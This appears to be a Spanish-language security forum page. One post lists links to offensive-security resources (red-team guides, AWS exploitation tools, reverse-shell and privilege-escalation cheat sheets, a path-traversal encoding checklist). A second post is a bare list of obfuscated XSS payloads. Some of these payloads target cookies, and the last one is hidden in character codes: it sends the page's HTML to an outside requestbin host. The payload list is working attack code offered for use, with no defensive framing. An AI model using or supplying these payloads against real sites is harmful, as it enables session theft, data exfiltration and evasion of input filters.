| Bienvenido, Invitado |
Tienes que registrarte para poder participar en nuestro foro.
|
| Usuarios en línea |
Actualmente hay 7 usuarios en línea.
» 0 miembro(s) | 6 invitado(s)
Google
|
|
|
| Guía de inspiración |
|
Enviado por: admin - 11-30-2022, 05:16 PM - Foro: ¿Cómo empezar?
- Sin respuestas
|
 |
MISC
Information
Vulnerabilities knowledge database
https://portswigger.net/kb/issues
JSON Hijacking
Keywords: JSON, hijacking
https://haacked.com/archive/2009/06/25/j...king.aspx/
Compilation of Facebook bug bounty writeups
Keywords: Facebook, compilation, writeup, bug bounty
https://www.facebook.com/notes/phwd/face...202701640/
Post / Examples
How I Hacked Facebook, and Found Someone's Backdoor Script
Keywords: SQLi, Facebook, RCE
http://devco.re/blog/2016/04/21/how-I-ha...t-eng-ver/
How to Detect HTTP Parameter Pollution Attacks
https://www.acunetix.com/blog/whitepaper...pollution/
Active Directory
Information
A Red Teamer’s Guide to GPOs and OUs
Keywords: AD, red team, group policy
https://wald0.com/?p=179
Abusing GPO Permissions
Keywords: AD, red team, GPO, group policy
https://blog.harmj0y.net/redteaming/abus...rmissions/
https://www.harmj0y.net/blog/redteaming/...rmissions/]
Posts / Examples
Kerberoasting Without Mimikatz
Keywords: Kerberos, AD
https://blog.harmj0y.net/blog/powershell...t-mimikatz
Android
Posts / Examples
Breaking The Facebook For Android Application
Keywords: Android, deeplink
https://ash-king.co.uk/facebook-bug-bounty-09-18.html
Hacking android apps with Frida I
Keywords: Frida, Android, DBI
https://www.codemetrix.net/hacking-andro...h-frida-1/
Hacking a game to learn FRIDA basics (Pwn Adventure 3)
Keywords: Frida, Android, game hacking
https://x-c3ll.github.io/posts/Frida-Pwn-Adventure-3/
Authentication / Authorization
Posts / Examples
Gaining access to private topics using quoting feature
Keywords: Discourse, authorization bypass, forum
https://hackerone.com/reports/312647
Getting any Facebook user's friend list and partial payment card details
Keywords: Facebook, authorization, GraphQL
https://www.josipfranjkovic.com/blog/fac...tcard-leak
AWS
Information
AWS Post Exploitation – Part 1
Keywords: aws, aws-cli
https://cloudsecops.com/aws-post-exploitation-part-1/
EC2 - Instance Metadata and User Data
Keywords: EC2
http://docs.aws.amazon.com/AWSEC2/latest...adata.html
How to perform S3 domain takeover
Keywords: S3, domain takeover
S3 bucket policy:
Código: {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "PublicReadGetObject",
"Effect": "Allow",
"Principal": "*",
"Action": [
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::exampledomain.com/*"
]
}
]
}
Posts / Examples
Tools
AWS pwn
Keywords: AWS
https://github.com/dagrz/aws_pwn
Scout2 - Security auditing tool for AWS environments
Keywords: AWS, Scout2, NCC
https://github.com/nccgroup/Scout2
Zeus - AWS Auditing & Hardening Tool
Keywords: AWS, hardening
https://github.com/DenizParlak/Zeus
https://github.com/RhinoSecurityLabs/pacu
https://github.com/andresriancho/nimbostratus
https://github.com/Ucnt/aws-s3-bruteforce
https://github.com/JR0ch17/S3Cruze
CORS
Information
HTTP access control (CORS)
Keywords: CORS
https://developer.mozilla.org/en-US/docs...ntrol_CORS
Posts / Examples
Exploiting CORS Misconfigurations for Bitcoins and Bounties
Keywords: CORS
http://blog.portswigger.net/2016/10/expl...s-for.html
Pre-domain wildcard CORS Exploitation
Keywords: CORS
https://medium.com/@arbazhussain/pre-dom...6ac1d4bd30
Crypto
Information
https://sites.google.com/site/cryptocrackprogram
https://r12a.github.io/uniview
https://github.com/nccgroup/featherduster
Posts / Examples
CBC "cut and paste" attack may cause Open Redirect (even XSS)
Keywords: CBC, crypto, redirect, token
https://hackerone.com/reports/126203
CSRF / SOP / CSP
Information
Authoritative guide to CORS (Cross-Origin Resource Sharing) for REST APIs
Keywords: CSRF
https://www.moesif.com/blog/technical/co...REST-APIs/
Posts / Examples
Exploiting CSRF on JSON endpoints with Flash and redirects
Keywords: CSRF, JSON
https://blog.appsecco.com/exploiting-csr...1d4ad6b31b
CSRF in 'set.php' via age causes stored XSS
Keywords: Rockstar, CSRF, XSS
https://hackerone.com/reports/152013
Plain text considered harmful: A cross-domain exploit
Keywords: SOP, JSONP, CSRF, Javascript
http://balpha.de/2013/02/plain-text-cons...n-exploit/
Bypass Same Origin Policy - BY-SOP (Challenge + explanations)
Keywords: SOP
https://github.com/mpgn/ByP-SOP/
Tools
Cloud (generic)
Posts / Examples
Hacking the Cloud
Keywords: Azure, AWS, Active Directory (AD)
https://adsecurity.org/wp-content/upload...-Final.pdf
Bypassing and exploiting Bucket Upload Policies and Signed URLs
Keywords: buckets, AWS, Google Cloud (GCP)
https://labs.detectify.com/2018/08/02/by...gned-urls/
Csv injection
Information
Posts / Examples
Comma separated vulnerabilities
Keywords: Openoffice, Libreoffice, Excel, export to csv
https://www.contextis.com/resources/blog...abilities/
Everything about the CSV Excel Macro Injection
Keywords: Excel, macro injection
http://blog.securelayer7.net/how-to-perf...injection/
Exploiting ‘Export as CSV’ functionality:The road to CSV Injection
Keywords: export as csv
http://www.tothenew.com/blog/csv-injection/
Cloud Security Risks (P2): CSV Injection in AWS CloudTrail
Keywords: AWS
https://rhinosecuritylabs.com/aws/cloud-...loudtrail/
http://blog.zsec.uk/csv-dangers-mitigations/
Bluetooth
Posts / Examples
Reversing and exploiting BLE 4.0 communication
Keywords: BLE, Bluetooth
http://payatu.com/reversing-exploiting-b...unication/
How to capture Bluetooth packets on Android 4.4
Keywords: BLE, Bluetooth, Android
https://www.nowsecure.com/blog/2014/02/0...droid-4-4/
This Is Not a Post About BLE, Introducing BLEAH
Keywords: BLE, Bluetooth
https://www.evilsocket.net/2017/09/23/Th...ing-BLEAH/
Desktop apps / Binaries
Information
Posts / Examples
XSS to RCE in Atlassian Hipchat
Keywords: RCE, XSS, Desktop, Electron
https://maustin.net/2015/11/12/hipchat_rce.html
Modern Alchemy: Turning XSS into RCE
Keywords: RCE, XSS, Desktop, Electron
https://blog.doyensec.com/2017/08/03/ele...urity.html
Tools
Directory/path traversal
Information
Directory Traversal Checklist
Keywords: checklist, path traversal, directory traversal
● 16 bit Unicode encoding:
● = %u002e, / = %u2215, \ = %u2216
● Double URL encoding:
●. = %252e, / = %252f, \ = %255c
● UTF-8 Unicode encoding:
●. = %c0%2e, %e0%40%ae, %c0ae, / = %c0%af, %e0%80%af, %c0%2f, \ = %c0%5c, %c0%80%5c
Django / Python
Information
Posts / Examples
Exploring server-side template injection in Flask Jinja2
Keywords: Flask, Jinja2
https://nvisium.com/blog/2016/03/09/expl...sk-jinja2/
Injecting Flask
Keywords: Flask
https://nvisium.com/blog/2015/12/07/injecting-flask/
Uber 遠端代碼執行- Uber.com Remote Code Execution via Flask Jinja2 Template Injection
Keywords: Flask, Jinja2
http://blog.orange.tw/2016/04/bug-bounty...ode_7.html
Tools
Ethereum
Posts / Examples
Thinking About Smart Contract Security
https://blog.ethereum.org/2016/06/19/thi...-security/
Exploiting
Information / Training
Linux Heap Exploitation Intro Series: Used and Abused – Use After Free
Keywords: use after free
https://sensepost.com/blog/2017/linux-he...fter-free/
Return oriented programming
Keywords: ROP, training
https://ropemporium.com/
Hunting In Memory
Keywords: shellcode injection, reflective DLL injection, memory module, process and module hollowing, Gargoyle (ROP/APC)
https://www.endgame.com/blog/technical-b...ing-memory
File upload / image upload
Posts / Examples
forum.getmonero.org Shell upload
Keywords: image upload, forum, php, shell, exif
https://hackerone.com/reports/357858
Google Cloud Platform
Tools
AWS pwn
Keywords: AWS
https://github.com/dagrz/aws_pwn
Google web toolkit (GWT)
From Serialized to Shell :: Auditing Google Web Toolkit
Keywords: GWT, RCE, serialization
https://srcincite.io/blog/2017/04/27/fro...olkit.html
HTTP Headers
Practical HTTP Host header attacks
Keywords: HTTP Headers, Host, cache poisoning
http://www.skeletonscribe.net/2013/05/pr...tacks.html
HTTP request smuggling
HTTP Desync Attacks: Request Smuggling Reborn
Keywords: smuggling, HTTP pipelining
https://portswigger.net/research/http-de...ing-reborn
iOS
Information / Tips
“Easy network monitoring on non jailbroken iOS:
1/ connect your iOS device to your macOS via USB
2/ rvictl -s <UDID]
3/ tcpdump|wireshark -i rvi0”
IoT / Hardware
Posts / Examples
Philips Hue Reverse Engineering (BH Talk ‘A Lightbulb Worm?’)
Keywords: Philips hue, IoT, Zigbee
http://colinoflynn.com/2016/08/philips-h...-hat-2016/
A Red Team Guide for a Hardware Penetration Test: Part 1
Keywords: Hardware, router, iot
https://adam-toscher.medium.com/a-red-te...14692da9a1
Tools
JWT (Json Web Token)
Information
JWT (JSON Web Token) (in)security
Keywords: JWT, json web tokens
https://research.securitum.com/jwt-json-...-security/
Posts / Examples
Critical Vulnerability Uncovered in JSON Encryption
Keywords: JWT, json
http://blogs.adobe.com/security/2017/03/...ption.html
Tools
LFI/RFI
Information
https://highon.coffee/blog/lfi-cheat-sheet/
https://www.hackthis.co.uk/articles/shel...elfenviron
https://blog.g0tmi1k.com/2012/02/kioptri...ocal-file/
Posts / Examples
LOCAL FILE READ VIA XSS IN DYNAMICALLY GENERATED PDF
Keywords: XSS, LFI, pdf generator, pdf
http://www.noob.ninja/2017/11/local-file...cally.html
PHP Remote File Inclusion command shell using data://
Keywords: PHP, RFI, LFI, URI
https://www.idontplaydarts.com/2011/03/p...ta-stream/
NodeJS / Javascript server-side
Posts / Examples
[demo.paypal.com] Node.js code injection (RCE)
Keywords: Paypal, Node, NodeJS, RCE
http://artsploit.blogspot.com.es/2016/08/pprce2.html
Exploiting Node.js deserialization bug for Remote Code Execution
Keywords: Node, NodeJS, RCE
https://opsecx.com/index.php/2017/02/08/...execution/
OAUTH
Information
Starting with OAuth 2.0 – Security Check && Secure OAuth 2.0: What Could Possibly Go Wrong?
Keywords: OAuth
https://www.securing.pl/en/starting-with...index.html
https://www.securing.pl/en/secure-oauth-...index.html
Posts / Examples
Login CSRF + Open Redirect -] Account Takeover
Keywords: Uber, CSRF, account takeover, Oauth theft
http://ngailong.com/uber-login-csrf-open...-takeover/
Tools
Open redirects
Information
Open Url Redirects
Keywords: open redirect, location
https://zseano.com/tutorials/1.html
Posts / Examples
Airbnb – Chaining Third-Party Open Redirect into Server-Side Request Forgery (SSRF) via LivePerson Chat
Keywords: SSRF
http://buer.haus/2017/03/09/airbnb-chain...rson-chat/
Powershell / Windows CMD
Information
15 Ways to Bypass the PowerShell Execution Policy
Keywords: Powershell, policy, bypass
https://blog.netspi.com/15-ways-to-bypas...on-policy/
DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques
Keywords: cmd.exe, obfuscation, windows
https://www.fireeye.com/content/dam/fire...report.pdf
Physical attacks / USB / HARDWARE
Information
Posts / Examples
Real-world Rubber Ducky attacks with Empire stagers
Keywords: Empire, Rubber Ducky, USB
https://www.sc0tfree.com/sc0tfree-blog/o...re-stagers
Red team exercises
Information
Red team tips
Keywords: red team, tips
https://vincentyiu.co.uk/red-team-tips/
Posts / Examples
From APK to Golden Ticket
Keywords: red team, apk, golden ticket
https://docs.google.com/document/d/1XWzl...zyxPfyW4GQ
Restricted shells
Information
Escape From SHELLcatraz - Breaking Out of Restricted Unix Shells
Keywords: shell escapes, restricted shell
https://speakerdeck.com/knaps/escape-fro...nix-shells
Restricted Linux Shell Escaping Techniques
Keywords: shell escapes, restricted shell
https://fireshellsecurity.team/restricte...echniques/
RCE
Information
Server-side Template injection / SSTI
Keywords: template, Mako, Jinja, Twig, Smarty
https://web-in-security.blogspot.co.uk/2...sheet.html
XXE payloads
Keywords: XXE, payloads, injection
https://gist.github.com/staaldraad/01415b990939494879b4
Exploitation: XML External Entity (XXE) Injection
Keywords: XXE
https://depthsecurity.com/blog/exploitat...-injection
XXE: How to become a Jedi
Keywords: XXE
https://www.slideshare.net/ssuserf09cba/...ome-a-jedi
Hunting in the Dark - Blind XXE
Keywords: XXE, blind
https://blog.zsec.uk/blind-xxe-learning/amp/
Playing with Content-Type – XXE on JSON Endpoints
Keywords: XXE, json, content-type
https://blog.netspi.com/playing-content-...endpoints/
XML Vulnerabilities and Attacks cheatsheet
Keywords: XXE, Cheatsheet
https://gist.github.com/mgeeky/4f726d3b3...19c9004870
Posts / Examples
XML External Entity Injection in Jive-n (CVE-2018-5758)
Keywords: XXE, Word, DTD
https://rhinosecuritylabs.com/research/x...2018-5758/
Cheatsheets (to be cleaned)
All in one References / Full blogs/sites
http://pwnwiki.io/#!index.md
https://jivoi.github.io/2015/07/01/pente...nd-tricks/
https://philippeharewood.com/
OSCP Reviews
http://www.abatchy.com/2017/03/how-to-pr...-noob.html
https://www.securitysift.com/offsec-pwb-oscp/
Enumeration Cheatsheet
https://highon.coffee/blog/nmap-cheat-sheet/
https://highon.coffee/blog/penetration-t...eat-sheet/
http://www.0daysecurity.com/penetration-...ation.html
Privilege Escalation
https://blog.g0tmi1k.com/2011/08/basic-l...scalation/
https://github.com/rebootuser/LinEnum
https://www.securitysift.com/download/li...checker.py
https://github.com/PenturaLabs/Linux_Exploit_Suggester
https://pentest.blog/windows-privilege-e...entesters/
https://www.youtube.com/watch?v=kMG8IsCohHA
http://www.fuzzysecurity.com/tutorials/16.html
https://toshellandback.com/2015/11/24/ms-priv-esc/
https://github.com/51x/WHP
https://isc.sans.edu/diary/Windows+Comma...+WMIC/1229
Abusing SUDO (Linux Privilege Escalation)
http://touhidshaikh.com/blog/?p=790
Reverse Shell Cheatsheet
https://www.phillips321.co.uk/2012/02/05...eat-sheet/
https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/she...heat-sheet
Get TTY shell
https://blog.ropnop.com/upgrading-simple...tive-ttys/
https://netsec.ws/?p=337
Buffer Overflow
https://www.corelan.be/index.php/2009/07...overflows/
http://netsec.ws/?p=180
Msfvenom Cheatsheet
http://security-geek.in/2016/09/07/msfve...eat-sheet/
Porting Metasploit Exploits
https://netsec.ws/?p=262
Port forwarding & Pivoting
https://artkond.com/2017/03/23/pivoting-guide/
http://atropineal.com/2016/11/18/pivotin...oxychains/
http://netsec.ws/?p=278
Client-Side Attacks
https://www.offensive-security.com/metas...-exploits/
Practice
https://www.hackthebox.eu/
https://www.vulnhub.com/
https://exploit-exercises.com/
https://shellterlabs.com/en/
|
|
|
| Payloads 1 |
|
Enviado por: admin - 11-30-2022, 04:27 PM - Foro: XSS
- Sin respuestas
|
|
Código: <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<embed src=/x//alert(1)><base href="javascript:\
https://gratipay.com/on/npm/cx%00A<svg onload=alert(1)>
</script><script src=/ñ.xyz>
<script src=//u00f1.xyz>
†‡•<img src=a onerror=javascript:alert('hacked')>…‰€
< and >
<script>prompt(1)</script>
<script>confirm(1)</script>
<script> var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk=')); </script>
<script> var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk=')); /script>
<script> var fn=window[atob('ZXZhbA==')]; fn(atob('YWxlcnQoMSk=')); </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>
<script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>
<script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script>
<script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script>
<script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script>
<script>throw~delete~typeof~prompt(1)</script>
<script>delete[a=alert]/prompt a(1)</script>
<script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script>
<script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script>
<script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch mport href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script>
<script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script>
<script>Array.from`${eval}alert\`1\``</script>
<script>Array.from([1],alert)</script>
<script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u>
<videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script>
<script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script>
<script>x=new class extends Function{}('alert(1)'); x=new x;</script>
<script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script>
<script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1)
<svg><script/xlink:href=data:,alert(1)></script>
<frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>
<img onerror="location='javascript:=lert(1)'" src="x">
<img onerror="location='javascript:%61lert(1)'" src="x">
<img onerror="location='javascript:\x2561lert(1)'" src="x">
<img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >
<script>alert(1)//
<script>alert(1)<!–
http://DOMAIN/PAGE.php/”><svg onload=alert(1)>
</ScRiPt><svg onload=alert(1)
</ScRiPt><svg onload=alert(1)%20
</ScRiPt><svg onload=prompt(1)%20
asd%27%3Balert%28%27XSS%27%29%3B%27
%3C%68%31%3E%54%68%69%73%20%69%73%20%61%20%74%65%73%74%3C%2F%68%31%3E
<script>alert(document.cookie)</script><
javascript:eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKTs='));
javascript:eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59))
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<img src='nonexistant' onerror='eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))' />
\uFE64%\uFF1Cscript/src=//...?
"><img src=x onerror=alert(document.domain)>
<%<script/src="//...?" class="badLink"
<form action="javasc
ript:eval(String.fromCharCode(118,97,114,32,109,97,114,107,117,112,61,100,111,99,117,109,101,110,116,46,100,111,99,117,109,101,110,116,69,108,101,109,101,110,116,46,105,110,110,101,114,72,84,77,76,59,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,115,58,47,47,114,101,113,117,101,115,116,98,46,105,110,47,115,122,54,113,104,97,115,122,63,116,101,120,116,61,34,43,101,110,99,111,100,101,85,82,73,40,109,97,114,107,117,112,41,46,115,117,98,115,116,114,105,110,103,40,48,44,55,48,48,41))"><button>Click</button></form>
|
|
|
|
|
